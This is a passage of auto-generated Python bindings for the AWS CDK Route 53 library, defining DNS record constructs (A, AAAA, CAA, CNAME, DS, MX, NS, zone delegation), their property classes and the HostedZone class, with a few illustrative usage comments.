jsii.create(ZoneDelegationRecord, self, [scope, id, props])
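# Example (illustrative sketch): delegating a subdomain to another zone's name
# servers. `stack`, `zone`, and the name-server hostnames are placeholders.
#
#     ZoneDelegationRecord(stack, "Delegation",
#         zone=zone,
#         record_name="sub",
#         name_servers=["ns1.example.net", "ns2.example.net"],
#     )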
@jsii.data_type(
jsii_type="@aws-cdk/aws-route53.ZoneDelegationRecordProps",
jsii_struct_bases=[RecordSetOptions],
name_mapping={
"zone": "zone",
"comment": "comment",
"record_name": "recordName",
"ttl": "ttl",
"name_servers": "nameServers",
},
)
class ZoneDelegationRecordProps(RecordSetOptions):
def __init__(
self,
*,
zone: IHostedZone,
comment: typing.Optional[builtins.str] = None,
record_name: typing.Optional[builtins.str] = None,
ttl: typing.Optional[aws_cdk.core.Duration] = None,
name_servers: typing.Sequence[builtins.str],
) -> None:
'''Construction properties for a ZoneDelegationRecord.
:param zone: The hosted zone in which to define the new record.
:param comment: A comment to add on the record. Default: no comment
:param record_name: The domain name for this record. Default: zone root
:param ttl: The resource record cache time to live (TTL). Default: Duration.minutes(30)
:param name_servers: The name servers to report in the delegation records.
'''
self._values: typing.Dict[str, typing.Any] = {
"zone": zone,
"name_servers": name_servers,
}
if comment is not None:
self._values["comment"] = comment
if record_name is not None:
self._values["record_name"] = record_name
if ttl is not None:
self._values["ttl"] = ttl
@builtins.property
def zone(self) -> IHostedZone:
'''The hosted zone in which to define the new record.'''
result = self._values.get("zone")
assert result is not None, "Required property 'zone' is missing"
return typing.cast(IHostedZone, result)
@builtins.property
def comment(self) -> typing.Optional[builtins.str]:
'''A comment to add on the record.
:default: no comment
'''
result = self._values.get("comment")
return typing.cast(typing.Optional[builtins.str], result)
@builtins.property
def record_name(self) -> typing.Optional[builtins.str]:
'''The domain name for this record.
:default: zone root
'''
result = self._values.get("record_name")
return typing.cast(typing.Optional[builtins.str], result)
@builtins.property
def ttl(self) -> typing.Optional[aws_cdk.core.Duration]:
'''The resource record cache time to live (TTL).
:default: Duration.minutes(30)
'''
result = self._values.get("ttl")
return typing.cast(typing.Optional[aws_cdk.core.Duration], result)
@builtins.property
def name_servers(self) -> typing.List[builtins.str]:
'''The name servers to report in the delegation records.'''
result = self._values.get("name_servers")
assert result is not None, "Required property 'name_servers' is missing"
return typing.cast(typing.List[builtins.str], result)
def __eq__(self, rhs: typing.Any) -> builtins.bool:
return isinstance(rhs, self.__class__) and rhs._values == self._values
def __ne__(self, rhs: typing.Any) -> builtins.bool:
return not (rhs == self)
def __repr__(self) -> str:
return "ZoneDelegationRecordProps(%s)" % ", ".join(
k + "=" + repr(v) for k, v in self._values.items()
)
class ARecord(
RecordSet,
metaclass=jsii.JSIIMeta,
jsii_type="@aws-cdk/aws-route53.ARecord",
):
'''A DNS A record.
:resource: AWS::Route53::RecordSet
'''
def __init__(
self,
scope: constructs.Construct,
id: builtins.str,
*,
target: RecordTarget,
zone: IHostedZone,
comment: typing.Optional[builtins.str] = None,
record_name: typing.Optional[builtins.str] = None,
ttl: typing.Optional[aws_cdk.core.Duration] = None,
) -> None:
'''
:param scope: -
:param id: -
:param target: The target.
:param zone: The hosted zone in which to define the new record.
:param comment: A comment to add on the record. Default: no comment
:param record_name: The domain name for this record. Default: zone root
:param ttl: The resource record cache time to live (TTL). Default: Duration.minutes(30)
'''
props = ARecordProps(
target=target, zone=zone, comment=comment, record_name=record_name, ttl=ttl
)
jsii.create(ARecord, self, [scope, id, props])
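# Example (illustrative sketch, assuming `stack` and `zone` exist; the IP
# address is a placeholder):
#
#     ARecord(stack, "Www",
#         zone=zone,
#         record_name="www",
#         target=RecordTarget.from_ip_addresses("192.0.2.1"),
#     )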
@jsii.data_type(
jsii_type="@aws-cdk/aws-route53.ARecordProps",
jsii_struct_bases=[RecordSetOptions],
name_mapping={
"zone": "zone",
"comment": "comment",
"record_name": "recordName",
"ttl": "ttl",
"target": "target",
},
)
class ARecordProps(RecordSetOptions):
def __init__(
self,
*,
zone: IHostedZone,
comment: typing.Optional[builtins.str] = None,
record_name: typing.Optional[builtins.str] = None,
ttl: typing.Optional[aws_cdk.core.Duration] = None,
target: RecordTarget,
) -> None:
'''Construction properties for an ARecord.
:param zone: The hosted zone in which to define the new record.
:param comment: A comment to add on the record. Default: no comment
:param record_name: The domain name for this record. Default: zone root
:param ttl: The resource record cache time to live (TTL). Default: Duration.minutes(30)
:param target: The target.
'''
self._values: typing.Dict[str, typing.Any] = {
"zone": zone,
"target": target,
}
if comment is not None:
self._values["comment"] = comment
if record_name is not None:
self._values["record_name"] = record_name
if ttl is not None:
self._values["ttl"] = ttl
@builtins.property
def zone(self) -> IHostedZone:
'''The hosted zone in which to define the new record.'''
result = self._values.get("zone")
assert result is not None, "Required property 'zone' is missing"
return typing.cast(IHostedZone, result)
@builtins.property
def comment(self) -> typing.Optional[builtins.str]:
'''A comment to add on the record.
:default: no comment
'''
result = self._values.get("comment")
return typing.cast(typing.Optional[builtins.str], result)
@builtins.property
def record_name(self) -> typing.Optional[builtins.str]:
'''The domain name for this record.
:default: zone root
'''
result = self._values.get("record_name")
return typing.cast(typing.Optional[builtins.str], result)
@builtins.property
def ttl(self) -> typing.Optional[aws_cdk.core.Duration]:
'''The resource record cache time to live (TTL).
:default: Duration.minutes(30)
'''
result = self._values.get("ttl")
return typing.cast(typing.Optional[aws_cdk.core.Duration], result)
@builtins.property
def target(self) -> RecordTarget:
'''The target.'''
result = self._values.get("target")
assert result is not None, "Required property 'target' is missing"
return typing.cast(RecordTarget, result)
def __eq__(self, rhs: typing.Any) -> builtins.bool:
return isinstance(rhs, self.__class__) and rhs._values == self._values
def __ne__(self, rhs: typing.Any) -> builtins.bool:
return not (rhs == self)
def __repr__(self) -> str:
return "ARecordProps(%s)" % ", ".join(
k + "=" + repr(v) for k, v in self._values.items()
)
class AaaaRecord(
RecordSet,
metaclass=jsii.JSIIMeta,
jsii_type="@aws-cdk/aws-route53.AaaaRecord",
):
'''A DNS AAAA record.
:resource: AWS::Route53::RecordSet
'''
def __init__(
self,
scope: constructs.Construct,
id: builtins.str,
*,
target: RecordTarget,
zone: IHostedZone,
comment: typing.Optional[builtins.str] = None,
record_name: typing.Optional[builtins.str] = None,
ttl: typing.Optional[aws_cdk.core.Duration] = None,
) -> None:
'''
:param scope: -
:param id: -
:param target: The target.
:param zone: The hosted zone in which to define the new record.
:param comment: A comment to add on the record. Default: no comment
:param record_name: The domain name for this record. Default: zone root
:param ttl: The resource record cache time to live (TTL). Default: Duration.minutes(30)
'''
props = AaaaRecordProps(
target=target, zone=zone, comment=comment, record_name=record_name, ttl=ttl
)
jsii.create(AaaaRecord, self, [scope, id, props])
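# Example (illustrative sketch, assuming `stack` and `zone` exist; the IPv6
# address is a placeholder):
#
#     AaaaRecord(stack, "Ipv6",
#         zone=zone,
#         target=RecordTarget.from_ip_addresses("2001:db8::1"),
#     )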
@jsii.data_type(
jsii_type="@aws-cdk/aws-route53.AaaaRecordProps",
jsii_struct_bases=[RecordSetOptions],
name_mapping={
"zone": "zone",
"comment": "comment",
"record_name": "recordName",
"ttl": "ttl",
"target": "target",
},
)
class AaaaRecordProps(RecordSetOptions):
def __init__(
self,
*,
zone: IHostedZone,
comment: typing.Optional[builtins.str] = None,
record_name: typing.Optional[builtins.str] = None,
ttl: typing.Optional[aws_cdk.core.Duration] = None,
target: RecordTarget,
) -> None:
'''Construction properties for an AaaaRecord.
:param zone: The hosted zone in which to define the new record.
:param comment: A comment to add on the record. Default: no comment
:param record_name: The domain name for this record. Default: zone root
:param ttl: The resource record cache time to live (TTL). Default: Duration.minutes(30)
:param target: The target.
'''
self._values: typing.Dict[str, typing.Any] = {
"zone": zone,
"target": target,
}
if comment is not None:
self._values["comment"] = comment
if record_name is not None:
self._values["record_name"] = record_name
if ttl is not None:
self._values["ttl"] = ttl
@builtins.property
def zone(self) -> IHostedZone:
'''The hosted zone in which to define the new record.'''
result = self._values.get("zone")
assert result is not None, "Required property 'zone' is missing"
return typing.cast(IHostedZone, result)
@builtins.property
def comment(self) -> typing.Optional[builtins.str]:
'''A comment to add on the record.
:default: no comment
'''
result = self._values.get("comment")
return typing.cast(typing.Optional[builtins.str], result)
@builtins.property
def record_name(self) -> typing.Optional[builtins.str]:
'''The domain name for this record.
:default: zone root
'''
result = self._values.get("record_name")
return typing.cast(typing.Optional[builtins.str], result)
@builtins.property
def ttl(self) -> typing.Optional[aws_cdk.core.Duration]:
'''The resource record cache time to live (TTL).
:default: Duration.minutes(30)
'''
result = self._values.get("ttl")
return typing.cast(typing.Optional[aws_cdk.core.Duration], result)
@builtins.property
def target(self) -> RecordTarget:
'''The target.'''
result = self._values.get("target")
assert result is not None, "Required property 'target' is missing"
return typing.cast(RecordTarget, result)
def __eq__(self, rhs: typing.Any) -> builtins.bool:
return isinstance(rhs, self.__class__) and rhs._values == self._values
def __ne__(self, rhs: typing.Any) -> builtins.bool:
return not (rhs == self)
def __repr__(self) -> str:
return "AaaaRecordProps(%s)" % ", ".join(
k + "=" + repr(v) for k, v in self._values.items()
)
class AddressRecordTarget(
RecordTarget,
metaclass=jsii.JSIIMeta,
jsii_type="@aws-cdk/aws-route53.AddressRecordTarget",
):
'''(deprecated) Target for a DNS A Record.
:deprecated: Use RecordTarget
:stability: deprecated
'''
def __init__(
self,
values: typing.Optional[typing.Sequence[builtins.str]] = None,
alias_target: typing.Optional[IAliasRecordTarget] = None,
) -> None:
'''
:param values: Values that correspond to the chosen record type (e.g. for the 'A' type, specify one or more IP addresses).
:param alias_target: An alias for targets, such as a CloudFront distribution, to route traffic to.
'''
jsii.create(AddressRecordTarget, self, [values, alias_target])
@jsii.data_type(
jsii_type="@aws-cdk/aws-route53.CaaAmazonRecordProps",
jsii_struct_bases=[RecordSetOptions],
name_mapping={
"zone": "zone",
"comment": "comment",
"record_name": "recordName",
"ttl": "ttl",
},
)
class CaaAmazonRecordProps(RecordSetOptions):
def __init__(
self,
*,
zone: IHostedZone,
comment: typing.Optional[builtins.str] = None,
record_name: typing.Optional[builtins.str] = None,
ttl: typing.Optional[aws_cdk.core.Duration] = None,
) -> None:
'''Construction properties for a CaaAmazonRecord.
:param zone: The hosted zone in which to define the new record.
:param comment: A comment to add on the record. Default: no comment
:param record_name: The domain name for this record. Default: zone root
:param ttl: The resource record cache time to live (TTL). Default: Duration.minutes(30)
'''
self._values: typing.Dict[str, typing.Any] = {
"zone": zone,
}
if comment is not None:
self._values["comment"] = comment
if record_name is not None:
self._values["record_name"] = record_name
if ttl is not None:
self._values["ttl"] = ttl
@builtins.property
def zone(self) -> IHostedZone:
'''The hosted zone in which to define the new record.'''
result = self._values.get("zone")
assert result is not None, "Required property 'zone' is missing"
return typing.cast(IHostedZone, result)
@builtins.property
def comment(self) -> typing.Optional[builtins.str]:
'''A comment to add on the record.
:default: no comment
'''
result = self._values.get("comment")
return typing.cast(typing.Optional[builtins.str], result)
@builtins.property
def record_name(self) -> typing.Optional[builtins.str]:
'''The domain name for this record.
:default: zone root
'''
result = self._values.get("record_name")
return typing.cast(typing.Optional[builtins.str], result)
@builtins.property
def ttl(self) -> typing.Optional[aws_cdk.core.Duration]:
'''The resource record cache time to live (TTL).
:default: Duration.minutes(30)
'''
result = self._values.get("ttl")
return typing.cast(typing.Optional[aws_cdk.core.Duration], result)
def __eq__(self, rhs: typing.Any) -> builtins.bool:
return isinstance(rhs, self.__class__) and rhs._values == self._values
def __ne__(self, rhs: typing.Any) -> builtins.bool:
return not (rhs == self)
def __repr__(self) -> str:
return "CaaAmazonRecordProps(%s)" % ", ".join(
k + "=" + repr(v) for k, v in self._values.items()
)
class CaaRecord(
RecordSet,
metaclass=jsii.JSIIMeta,
jsii_type="@aws-cdk/aws-route53.CaaRecord",
):
'''A DNS CAA record.
:resource: AWS::Route53::RecordSet
'''
def __init__(
self,
scope: constructs.Construct,
id: builtins.str,
*,
values: typing.Sequence[CaaRecordValue],
zone: IHostedZone,
comment: typing.Optional[builtins.str] = None,
record_name: typing.Optional[builtins.str] = None,
ttl: typing.Optional[aws_cdk.core.Duration] = None,
) -> None:
'''
:param scope: -
:param id: -
:param values: The values.
:param zone: The hosted zone in which to define the new record.
:param comment: A comment to add on the record. Default: no comment
:param record_name: The domain name for this record. Default: zone root
:param ttl: The resource record cache time to live (TTL). Default: Duration.minutes(30)
'''
props = CaaRecordProps(
values=values, zone=zone, comment=comment, record_name=record_name, ttl=ttl
)
jsii.create(CaaRecord, self, [scope, id, props])
@jsii.data_type(
jsii_type="@aws-cdk/aws-route53.CaaRecordProps",
jsii_struct_bases=[RecordSetOptions],
name_mapping={
"zone": "zone",
"comment": "comment",
"record_name": "recordName",
"ttl": "ttl",
"values": "values",
},
)
class CaaRecordProps(RecordSetOptions):
def __init__(
self,
*,
zone: IHostedZone,
comment: typing.Optional[builtins.str] = None,
record_name: typing.Optional[builtins.str] = None,
ttl: typing.Optional[aws_cdk.core.Duration] = None,
values: typing.Sequence[CaaRecordValue],
) -> None:
'''Construction properties for a CaaRecord.
:param zone: The hosted zone in which to define the new record.
:param comment: A comment to add on the record. Default: no comment
:param record_name: The domain name for this record. Default: zone root
:param ttl: The resource record cache time to live (TTL). Default: Duration.minutes(30)
:param values: The values.
'''
self._values: typing.Dict[str, typing.Any] = {
"zone": zone,
"values": values,
}
if comment is not None:
self._values["comment"] = comment
if record_name is not None:
self._values["record_name"] = record_name
if ttl is not None:
self._values["ttl"] = ttl
@builtins.property
def zone(self) -> IHostedZone:
'''The hosted zone in which to define the new record.'''
result = self._values.get("zone")
assert result is not None, "Required property 'zone' is missing"
return typing.cast(IHostedZone, result)
@builtins.property
def comment(self) -> typing.Optional[builtins.str]:
'''A comment to add on the record.
:default: no comment
'''
result = self._values.get("comment")
return typing.cast(typing.Optional[builtins.str], result)
@builtins.property
def record_name(self) -> typing.Optional[builtins.str]:
'''The domain name for this record.
:default: zone root
'''
result = self._values.get("record_name")
return typing.cast(typing.Optional[builtins.str], result)
@builtins.property
def ttl(self) -> typing.Optional[aws_cdk.core.Duration]:
'''The resource record cache time to live (TTL).
:default: Duration.minutes(30)
'''
result = self._values.get("ttl")
return typing.cast(typing.Optional[aws_cdk.core.Duration], result)
@builtins.property
def values(self) -> typing.List[CaaRecordValue]:
'''The values.'''
result = self._values.get("values")
assert result is not None, "Required property 'values' is missing"
return typing.cast(typing.List[CaaRecordValue], result)
def __eq__(self, rhs: typing.Any) -> builtins.bool:
return isinstance(rhs, self.__class__) and rhs._values == self._values
def __ne__(self, rhs: typing.Any) -> builtins.bool:
return not (rhs == self)
def __repr__(self) -> str:
return "CaaRecordProps(%s)" % ", ".join(
k + "=" + repr(v) for k, v in self._values.items()
)
class CnameRecord(
RecordSet,
metaclass=jsii.JSIIMeta,
jsii_type="@aws-cdk/aws-route53.CnameRecord",
):
'''A DNS CNAME record.
:resource: AWS::Route53::RecordSet
'''
def __init__(
self,
scope: constructs.Construct,
id: builtins.str,
*,
domain_name: builtins.str,
zone: IHostedZone,
comment: typing.Optional[builtins.str] = None,
record_name: typing.Optional[builtins.str] = None,
ttl: typing.Optional[aws_cdk.core.Duration] = None,
) -> None:
'''
:param scope: -
:param id: -
:param domain_name: The domain name.
:param zone: The hosted zone in which to define the new record.
:param comment: A comment to add on the record. Default: no comment
:param record_name: The domain name for this record. Default: zone root
:param ttl: The resource record cache time to live (TTL). Default: Duration.minutes(30)
'''
props = CnameRecordProps(
domain_name=domain_name,
zone=zone,
comment=comment,
record_name=record_name,
ttl=ttl,
)
jsii.create(CnameRecord, self, [scope, id, props])
@jsii.data_type(
jsii_type="@aws-cdk/aws-route53.CnameRecordProps",
jsii_struct_bases=[RecordSetOptions],
name_mapping={
"zone": "zone",
"comment": "comment",
"record_name": "recordName",
"ttl": "ttl",
"domain_name": "domainName",
},
)
class CnameRecordProps(RecordSetOptions):
def __init__(
self,
*,
zone: IHostedZone,
comment: typing.Optional[builtins.str] = None,
record_name: typing.Optional[builtins.str] = None,
ttl: typing.Optional[aws_cdk.core.Duration] = None,
domain_name: builtins.str,
) -> None:
'''Construction properties for a CnameRecord.
:param zone: The hosted zone in which to define the new record.
:param comment: A comment to add on the record. Default: no comment
:param record_name: The domain name for this record. Default: zone root
:param ttl: The resource record cache time to live (TTL). Default: Duration.minutes(30)
:param domain_name: The domain name.
'''
self._values: typing.Dict[str, typing.Any] = {
"zone": zone,
"domain_name": domain_name,
}
if comment is not None:
self._values["comment"] = comment
if record_name is not None:
self._values["record_name"] = record_name
if ttl is not None:
self._values["ttl"] = ttl
@builtins.property
def zone(self) -> IHostedZone:
'''The hosted zone in which to define the new record.'''
result = self._values.get("zone")
assert result is not None, "Required property 'zone' is missing"
return typing.cast(IHostedZone, result)
@builtins.property
def comment(self) -> typing.Optional[builtins.str]:
'''A comment to add on the record.
:default: no comment
'''
result = self._values.get("comment")
return typing.cast(typing.Optional[builtins.str], result)
@builtins.property
def record_name(self) -> typing.Optional[builtins.str]:
'''The domain name for this record.
:default: zone root
'''
result = self._values.get("record_name")
return typing.cast(typing.Optional[builtins.str], result)
@builtins.property
def ttl(self) -> typing.Optional[aws_cdk.core.Duration]:
'''The resource record cache time to live (TTL).
:default: Duration.minutes(30)
'''
result = self._values.get("ttl")
return typing.cast(typing.Optional[aws_cdk.core.Duration], result)
@builtins.property
def domain_name(self) -> builtins.str:
'''The domain name.'''
result = self._values.get("domain_name")
assert result is not None, "Required property 'domain_name' is missing"
return typing.cast(builtins.str, result)
def __eq__(self, rhs: typing.Any) -> builtins.bool:
return isinstance(rhs, self.__class__) and rhs._values == self._values
def __ne__(self, rhs: typing.Any) -> builtins.bool:
return not (rhs == self)
def __repr__(self) -> str:
return "CnameRecordProps(%s)" % ", ".join(
k + "=" + repr(v) for k, v in self._values.items()
)
class DsRecord(
RecordSet,
metaclass=jsii.JSIIMeta,
jsii_type="@aws-cdk/aws-route53.DsRecord",
):
'''A DNS DS record.
:resource: AWS::Route53::RecordSet
'''
def __init__(
self,
scope: constructs.Construct,
id: builtins.str,
*,
values: typing.Sequence[builtins.str],
zone: IHostedZone,
comment: typing.Optional[builtins.str] = None,
record_name: typing.Optional[builtins.str] = None,
ttl: typing.Optional[aws_cdk.core.Duration] = None,
) -> None:
'''
:param scope: -
:param id: -
:param values: The DS values.
:param zone: The hosted zone in which to define the new record.
:param comment: A comment to add on the record. Default: no comment
:param record_name: The domain name for this record. Default: zone root
:param ttl: The resource record cache time to live (TTL). Default: Duration.minutes(30)
'''
props = DsRecordProps(
values=values, zone=zone, comment=comment, record_name=record_name, ttl=ttl
)
jsii.create(DsRecord, self, [scope, id, props])
@jsii.data_type(
jsii_type="@aws-cdk/aws-route53.DsRecordProps",
jsii_struct_bases=[RecordSetOptions],
name_mapping={
"zone": "zone",
"comment": "comment",
"record_name": "recordName",
"ttl": "ttl",
"values": "values",
},
)
class DsRecordProps(RecordSetOptions):
def __init__(
self,
*,
zone: IHostedZone,
comment: typing.Optional[builtins.str] = None,
record_name: typing.Optional[builtins.str] = None,
ttl: typing.Optional[aws_cdk.core.Duration] = None,
values: typing.Sequence[builtins.str],
) -> None:
'''Construction properties for a DSRecord.
:param zone: The hosted zone in which to define the new record.
:param comment: A comment to add on the record. Default: no comment
:param record_name: The domain name for this record. Default: zone root
:param ttl: The resource record cache time to live (TTL). Default: Duration.minutes(30)
:param values: The DS values.
'''
self._values: typing.Dict[str, typing.Any] = {
"zone": zone,
"values": values,
}
if comment is not None:
self._values["comment"] = comment
if record_name is not None:
self._values["record_name"] = record_name
if ttl is not None:
self._values["ttl"] = ttl
@builtins.property
def zone(self) -> IHostedZone:
'''The hosted zone in which to define the new record.'''
result = self._values.get("zone")
assert result is not None, "Required property 'zone' is missing"
return typing.cast(IHostedZone, result)
@builtins.property
def comment(self) -> typing.Optional[builtins.str]:
'''A comment to add on the record.
:default: no comment
'''
result = self._values.get("comment")
return typing.cast(typing.Optional[builtins.str], result)
@builtins.property
def record_name(self) -> typing.Optional[builtins.str]:
'''The domain name for this record.
:default: zone root
'''
result = self._values.get("record_name")
return typing.cast(typing.Optional[builtins.str], result)
@builtins.property
def ttl(self) -> typing.Optional[aws_cdk.core.Duration]:
'''The resource record cache time to live (TTL).
:default: Duration.minutes(30)
'''
result = self._values.get("ttl")
return typing.cast(typing.Optional[aws_cdk.core.Duration], result)
@builtins.property
def values(self) -> typing.List[builtins.str]:
'''The DS values.'''
result = self._values.get("values")
assert result is not None, "Required property 'values' is missing"
return typing.cast(typing.List[builtins.str], result)
def __eq__(self, rhs: typing.Any) -> builtins.bool:
return isinstance(rhs, self.__class__) and rhs._values == self._values
def __ne__(self, rhs: typing.Any) -> builtins.bool:
return not (rhs == self)
def __repr__(self) -> str:
return "DsRecordProps(%s)" % ", ".join(
k + "=" + repr(v) for k, v in self._values.items()
)
@jsii.implements(IHostedZone)
class HostedZone(
aws_cdk.core.Resource,
metaclass=jsii.JSIIMeta,
jsii_type="@aws-cdk/aws-route53.HostedZone",
):
'''Container for records, and records contain information about how to route traffic for a specific domain, such as example.com and its subdomains (acme.example.com, zenith.example.com).'''
def __init__(
self,
scope: constructs.Construct,
id: builtins.str,
*,
vpcs: typing.Optional[typing.Sequence[aws_cdk.aws_ec2.IVpc]] = None,
zone_name: builtins.str,
comment: typing.Optional[builtins.str] = None,
query_logs_log_group_arn: typing.Optional[builtins.str] = None,
) -> None:
'''
:param scope: -
:param id: -
:param vpcs: A VPC that you want to associate with this hosted zone. When you specify this property, a private hosted zone will be created. You can associate additional VPCs to this private zone using ``addVpc(vpc)``. Default: public (no VPCs associated)
:param zone_name: The name of the domain. For resource record types that include a domain name, specify a fully qualified domain name.
:param comment: Any comments that you want to include about the hosted zone. Default: none
:param query_logs_log_group_arn: The Amazon Resource Name (ARN) for the log group that you want Amazon Route 53 to send query logs to. Default: disabled
'''
props = HostedZoneProps(
vpcs=vpcs,
zone_name=zone_name,
comment=comment,
query_logs_log_group_arn=query_logs_log_group_arn,
)
jsii.create(HostedZone, self, [scope, id, props])
@jsii.member(jsii_name="fromHostedZoneAttributes") # type: ignore[misc]
@builtins.classmethod
def from_hosted_zone_attributes(
cls,
scope: constructs.Construct,
id: builtins.str,
*,
hosted_zone_id: builtins.str,
zone_name: builtins.str,
) -> IHostedZone:
'''Imports a hosted zone from another stack.
Use when both hosted zone ID and hosted zone name are known.
:param scope: the parent Construct for this Construct.
:param id: the logical name of this Construct.
:param hosted_zone_id: Identifier of the hosted zone.
:param zone_name: Name of the hosted zone.
'''
attrs = HostedZoneAttributes(
hosted_zone_id=hosted_zone_id, zone_name=zone_name
)
return typing.cast(IHostedZone, jsii.sinvoke(cls, "fromHostedZoneAttributes", [scope, id, attrs]))
@jsii.member(jsii_name="fromHostedZoneId") # type: ignore[misc]
@builtins.classmethod
def from_hosted_zone_id(
cls,
scope: constructs.Construct,
id: builtins.str,
hosted_zone_id: builtins.str,
) -> IHostedZone:
'''Import a Route 53 hosted zone defined either outside the CDK, or in a different CDK stack.
Use when hosted zone ID is known. Hosted zone name becomes unavailable through this query.
:param scope: the parent Construct for this Construct.
:param id: the logical name of this Construct.
:param hosted_zone_id: the ID of the hosted zone to import.
'''
return typing.cast(IHostedZone, jsii.sinvoke(cls, "fromHostedZoneId", [scope, id, hosted_zone_id]))
@jsii.member(jsii_name="fromLookup") # type: ignore[misc]
@builtins.classmethod
def from_lookup(
cls,
scope: constructs.Construct,
id: builtins.str,
*,
domain_name: builtins.str,
private_zone: typing.Optional[builtins.bool] = None,
vpc_id: typing.Optional[builtins.str] = None,
) -> IHostedZone:
'''Lookup a hosted zone in the current account/region based on query parameters.
Requires an environment: you must specify ``env`` for the stack.
Use to easily query hosted zones.
:param scope: -
:param id: -
:param domain_name: The zone domain e.g. example.com.
:param private_zone: Whether the zone that is being looked up is a private hosted zone. Default: false
:param vpc_id: Specifies the ID of the VPC associated with a private hosted zone. If a VPC ID is provided and privateZone is false, no results will be returned and an error will be raised. Default: - No VPC ID
:see: https://docs.aws.amazon.com/cdk/latest/guide/environments.html
'''
query = HostedZoneProviderProps(
domain_name=domain_name, private_zone=private_zone, vpc_id=vpc_id
)
return typing.cast(IHostedZone, jsii.sinvoke(cls, "fromLookup", [scope, id, query]))
@jsii.member(jsii_name="addVpc")
def add_vpc(self, vpc: aws_cdk.aws_ec2.IVpc) -> None:
'''Add another VPC to this private hosted zone.
:param vpc: the other VPC to add.
'''
return typing.cast(None, jsii.invoke(self, "addVpc", [vpc]))
@builtins.property # type: ignore[misc]
@jsii.member(jsii_name="hostedZoneArn")
def hosted_zone_arn(self) -> builtins.str:
'''ARN of this hosted zone, such as arn:${Partition}:route53:::hostedzone/${Id}.'''
return typing.cast(builtins.str, jsii.get(self, "hostedZoneArn"))
@builtins.property # type: ignore[misc]
@jsii.member(jsii_name="hostedZoneId")
def hosted_zone_id(self) -> builtins.str:
'''ID of this hosted zone, such as "Z23ABC4XYZL05B".'''
return typing.cast(builtins.str, jsii.get(self, "hostedZoneId"))
@builtins.property # type: ignore[misc]
@jsii.member(jsii_name="vpcs")
def _vpcs(self) -> typing.List[CfnHostedZone.VPCProperty]:
'''VPCs to which this hosted zone will be added.'''
return typing.cast(typing.List[CfnHostedZone.VPCProperty], jsii.get(self, "vpcs"))
@builtins.property # type: ignore[misc]
@jsii.member(jsii_name="zoneName")
def zone_name(self) -> builtins.str:
'''FQDN of this hosted zone.'''
return typing.cast(builtins.str, jsii.get(self, "zoneName"))
@builtins.property # type: ignore[misc]
@jsii.member(jsii_name="hostedZoneNameServers")
def hosted_zone_name_servers(self) -> typing.Optional[typing.List[builtins.str]]:
'''Returns the set of name servers for the specific hosted zone. For example: ns1.example.com.
This attribute will be undefined for private hosted zones or hosted zones imported from another stack.
'''
return typing.cast(typing.Optional[typing.List[builtins.str]], jsii.get(self, "hostedZoneNameServers"))
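The ``hosted_zone_arn`` docstring above gives the ARN shape ``arn:${Partition}:route53:::hostedzone/${Id}``. Route 53 is a global service, so the region and account fields of the ARN stay empty. A tiny helper (hypothetical, not part of this module) rendering that shape:

```python
def hosted_zone_arn(partition: str, hosted_zone_id: str) -> str:
    # Region and account-id segments are intentionally empty for Route 53.
    return f"arn:{partition}:route53:::hostedzone/{hosted_zone_id}"

print(hosted_zone_arn("aws", "Z23ABC4XYZL05B"))
# arn:aws:route53:::hostedzone/Z23ABC4XYZL05B
```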
class MxRecord(
RecordSet,
metaclass=jsii.JSIIMeta,
jsii_type="@aws-cdk/aws-route53.MxRecord",
):
'''A DNS MX record.
:resource: AWS::Route53::RecordSet
'''
def __init__(
self,
scope: constructs.Construct,
id: builtins.str,
*,
values: typing.Sequence[MxRecordValue],
zone: IHostedZone,
comment: typing.Optional[builtins.str] = None,
record_name: typing.Optional[builtins.str] = None,
ttl: typing.Optional[aws_cdk.core.Duration] = None,
) -> None:
'''
:param scope: -
:param id: -
:param values: The values.
:param zone: The hosted zone in which to define the new record.
:param comment: A comment to add on the record. Default: no comment
:param record_name: The domain name for this record. Default: zone root
:param ttl: The resource record cache time to live (TTL). Default: Duration.minutes(30)
'''
props = MxRecordProps(
values=values, zone=zone, comment=comment, record_name=record_name, ttl=ttl
)
jsii.create(MxRecord, self, [scope, id, props])
@jsii.data_type(
jsii_type="@aws-cdk/aws-route53.MxRecordProps",
jsii_struct_bases=[RecordSetOptions],
name_mapping={
"zone": "zone",
"comment": "comment",
"record_name": "recordName",
"ttl": "ttl",
"values": "values",
},
)
class MxRecordProps(RecordSetOptions):
def __init__(
self,
*,
zone: IHostedZone,
comment: typing.Optional[builtins.str] = None,
record_name: typing.Optional[builtins.str] = None,
ttl: typing.Optional[aws_cdk.core.Duration] = None,
values: typing.Sequence[MxRecordValue],
) -> None:
'''Construction properties for an MxRecord.
:param zone: The hosted zone in which to define the new record.
:param comment: A comment to add on the record. Default: no comment
:param record_name: The domain name for this record. Default: zone root
:param ttl: The resource record cache time to live (TTL). Default: Duration.minutes(30)
:param values: The values.
'''
self._values: typing.Dict[str, typing.Any] = {
"zone": zone,
"values": values,
}
if comment is not None:
self._values["comment"] = comment
if record_name is not None:
self._values["record_name"] = record_name
if ttl is not None:
self._values["ttl"] = ttl
@builtins.property
def zone(self) -> IHostedZone:
'''The hosted zone in which to define the new record.'''
result = self._values.get("zone")
assert result is not None, "Required property 'zone' is missing"
return typing.cast(IHostedZone, result)
@builtins.property
def comment(self) -> typing.Optional[builtins.str]:
'''A comment to add on the record.
:default: no comment
'''
result = self._values.get("comment")
return typing.cast(typing.Optional[builtins.str], result)
@builtins.property
def record_name(self) -> typing.Optional[builtins.str]:
'''The domain name for this record.
:default: zone root
'''
result = self._values.get("record_name")
return typing.cast(typing.Optional[builtins.str], result)
@builtins.property
def ttl(self) -> typing.Optional[aws_cdk.core.Duration]:
'''The resource record cache time to live (TTL).
:default: Duration.minutes(30)
'''
result = self._values.get("ttl")
return typing.cast(typing.Optional[aws_cdk.core.Duration], result)
@builtins.property
def values(self) -> typing.List[MxRecordValue]:
'''The values.'''
result = self._values.get("values")
assert result is not None, "Required property 'values' is missing"
return typing.cast(typing.List[MxRecordValue], result)
def __eq__(self, rhs: typing.Any) -> builtins.bool:
return isinstance(rhs, self.__class__) and rhs._values == self._values
def __ne__(self, rhs: typing.Any) -> builtins.bool:
return not (rhs == self)
def __repr__(self) -> str:
return "MxRecordProps(%s)" % ", ".join(
k + "=" + repr(v) for k, v in self._values.items()
)
class NsRecord(
RecordSet,
metaclass=jsii.JSIIMeta,
jsii_type="@aws-cdk/aws-route53.NsRecord",
):
'''A DNS NS record.
:resource: AWS::Route53::RecordSet
'''
def __init__(
self,
scope: constructs.Construct,
id: builtins.str,
*,
values: typing.Sequence[builtins.str],
zone: IHostedZone,
comment: typing.Optional[builtins.str] = None,
